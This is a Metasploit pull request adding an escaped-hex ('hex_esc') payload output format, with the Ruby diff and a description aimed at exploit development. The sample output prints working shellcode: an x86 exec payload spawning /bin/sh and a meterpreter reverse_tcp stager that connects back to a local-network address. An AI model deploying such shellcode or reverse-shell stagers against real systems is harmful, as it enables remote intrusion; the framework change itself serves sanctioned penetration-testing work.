### PR TITLE
Adds escaped hex (\x) option to payload output formats

### DIFF
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -18,6 +18,26 @@ module Buffer
   # Serializes a buffer to a provided format.  The formats supported are raw,
   # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
   #
+
+  def self.escape_hex(buf)
+    i = 0
+    buf = Rex::Text.to_hex(buf, '')
+    escaped = ''
+    if (buf.length != 0) && (buf.length <= 10000)
+      escaped = '\\x'
+      while i < buf.length
+        escaped = escaped + buf[i]
+	if (i % 2 == 1) && (i != buf.length - 1)
+	  escaped = escaped + '\\x'
+	end
+	i += 1
+      end
+    else
+    escaped = "\x0a===============================================\x0a|| Your payload is too big for this format!! ||\x0a===============================================\x0a\x0a"
+    end
+   return escaped
+  end
+
   def self.transform(buf, fmt = "ruby", var_name = 'buf')
     default_wrap = 60
 
@@ -27,6 +47,8 @@ module Buffer
         buf = Rex::Text.to_num(buf)
       when 'hex'
         buf = Rex::Text.to_hex(buf, '')
+      when 'hex_esc'
+        buf = escape_hex(buf)
       when 'dword', 'dw'
         buf = Rex::Text.to_dword(buf)
       when 'python', 'py'
@@ -67,7 +89,7 @@ module Buffer
   def self.comment(buf, fmt = "ruby")
     case fmt
       when 'raw'
-      when 'num', 'dword', 'dw', 'hex'
+      when 'num', 'dword', 'dw', 'hex', 'hex_esc'
         buf = Rex::Text.to_js_comment(buf)
       when 'ruby', 'rb', 'python', 'py'
         buf = Rex::Text.to_ruby_comment(buf)
@@ -101,6 +123,7 @@ module Buffer
       'dw',
       'dword',
       'hex',
+      'hex_esc',
       'java',
       'js_be',
       'js_le',

--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -21,18 +21,24 @@ module Buffer
 
   def self.escape_hex(buf)
     i = 0
+    # Transform the buffer into hex
     buf = Rex::Text.to_hex(buf, '')
     escaped = ''
-    if (buf.length != 0) && (buf.length <= 10000)
+    # Check that the buffer isn't empty and less than 10,000 bytes
+    if (buf.length != 0) && (buf.length <= 20000)
       escaped = '\\x'
       while i < buf.length
         escaped = escaped + buf[i]
-	if (i % 2 == 1) && (i != buf.length - 1)
-	  escaped = escaped + '\\x'
-	end
-	i += 1
+        # Insert \x after every two characters but not at the end of the string
+        if (i % 2 == 1) && (i != buf.length - 1)
+          escaped = escaped + '\\x'
+        end
+        i += 1
       end
     else
+    # This method of inserting \x into the string is order O(n) so for a large string it will take far too long
+    # to actually finish. The scenario in which this format will be useful typically involves shorter strings
+    # (shellcodes and their ilk).
     escaped = "\x0a===============================================\x0a|| Your payload is too big for this format!! ||\x0a===============================================\x0a\x0a"
     end
    return escaped
@@ -48,7 +54,7 @@ module Buffer
       when 'hex'
         buf = Rex::Text.to_hex(buf, '')
       when 'hex_esc'
-        buf = escape_hex(buf)
+        buf = self.escape_hex(buf)
       when 'dword', 'dw'
         buf = Rex::Text.to_dword(buf)
       when 'python', 'py'

--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -15,8 +15,8 @@ module Simple
 module Buffer
 
   #
-  # Serializes a buffer to a provided format.  The formats supported are raw,
-  # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
+  # Serializes a buffer to hex, and then inserts '\\x' in front of every
+  # byte. Only accepts buffers less than 10,000 bytes in length.
   #
 
   def self.escape_hex(buf)
@@ -43,6 +43,11 @@ module Buffer
     end
    return escaped
   end
+
+ #
+ # Serializes a buffer to a provided format.  The formats supported are raw,
+ # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
+ #
 
   def self.transform(buf, fmt = "ruby", var_name = 'buf')
     default_wrap = 60


### PR DESCRIPTION
During exploit development, it is often useful to have shellcode escaped by `\x` so that it can be entered into a buffer of some sorts, often by way of some command-line interpreter. The closest Metasploit currently supports to this end is outputting payloads in `hex` format. This pull request adds a variation to this format, `hex_esc`, that escapes the `hex` output with `\x`, allowing for quicker exploit development in certain applications.
There are several ways that this addition could have been approached, but I thought best to follow the path of least resistance. So rather than submit PR's to the `Rex::Text` library and then also to `metasploit-framework`, I have just modified `lib/msf/base/simple/buffer.rb` to include an `escape_hex` method and added `hex_esc` to the `fmt` `case`'s.
There is one caveat however, in that adding `\x` in between every two characters of a string is a very verbose operation - effectively doubling the size of the string. Luckily however, this particular format would typically be used in buffer overflow (and similar) exploits where the space for a payload is usually severely limited. In this case, the payload formatted as `hex` will be comparably small. A check is made to ensure that the buffer length is less that 20000 characters (which equates to 10,000 bytes of payload). This is probably still excessive, but is only meant to catch any accidental uses (such as a full meterpreter payload, as below)

## Sample Output with `buf.length` < 20000
```
msf > use payload/linux/x86/exec
msf payload(exec) > set CMD /bin/sh
CMD => /bin/sh
msf payload(exec) > generate -t hex_esc
// linux/x86/exec - 43 bytes
// http://www.metasploit.com
// VERBOSE=false, PrependFork=false, PrependSetresuid=false, 
// PrependSetreuid=false, PrependSetuid=false, 
// PrependSetresgid=false, PrependSetregid=false, 
// PrependSetgid=false, PrependChrootBreak=false, 
// AppendExit=false, CMD=/bin/sh
\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80
```

## Sample Output with `buf.length` > 20000
```
msf > use payload/linux/x86/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.1.100
LHOST => 192.168.1.100
msf payload(reverse_tcp) > generate -t hex_esc
// linux/x86/meterpreter/reverse_tcp - 99 bytes (stage 1)
// http://www.metasploit.com
// VERBOSE=false, LHOST=192.168.1.111, LPORT=4444, 
// ReverseAllowProxy=false, ReverseConnectRetries=5, 
// ReverseListenerThreaded=false, AutoLoadStdapi=true, 
// AutoVerifySession=true, AutoVerifySessionTimeout=30, 
// InitialAutoRunScript=, AutoRunScript=, AutoSystemInfo=true, 
// EnableUnicodeEncoding=false, SessionRetryTotal=3600, 
// SessionRetryWait=10, SessionExpirationTimeout=604800, 
// SessionCommunicationTimeout=300, PayloadUUIDTracking=false, 
// EnableStageEncoding=false, StageEncoderSaveRegisters=, 
// StageEncodingFallback=true, PrependFork=false, 
// PrependSetresuid=false, PrependSetreuid=false, 
// PrependSetuid=false, PrependSetresgid=false, 
// PrependSetregid=false, PrependSetgid=false, 
// PrependChrootBreak=false, AppendExit=false
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80\x85\xc0\x78\x44\x97\x5b\x68\xc0\xa8\x01\x6f\x68\x02\x00\x11\x5c\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\x85\xc0\x78\x27\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x85\xc0\x78\x10\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\x85\xc0\x78\x02\xff\xe1\xb8\x01\x00\x00\x00\xbb\x01\x00\x00\x00\xcd\x80
// linux/x86/meterpreter/reverse_tcp - 797784 bytes (stage 2)
// http://www.metasploit.com

===============================================
|| Your payload is too big for this format!! ||
===============================================

```
Note that in the above, the stager shellcode is less than 10000 bytes, so successfully passes the check, but the rest of the meterpreter payload fails and the error is raised.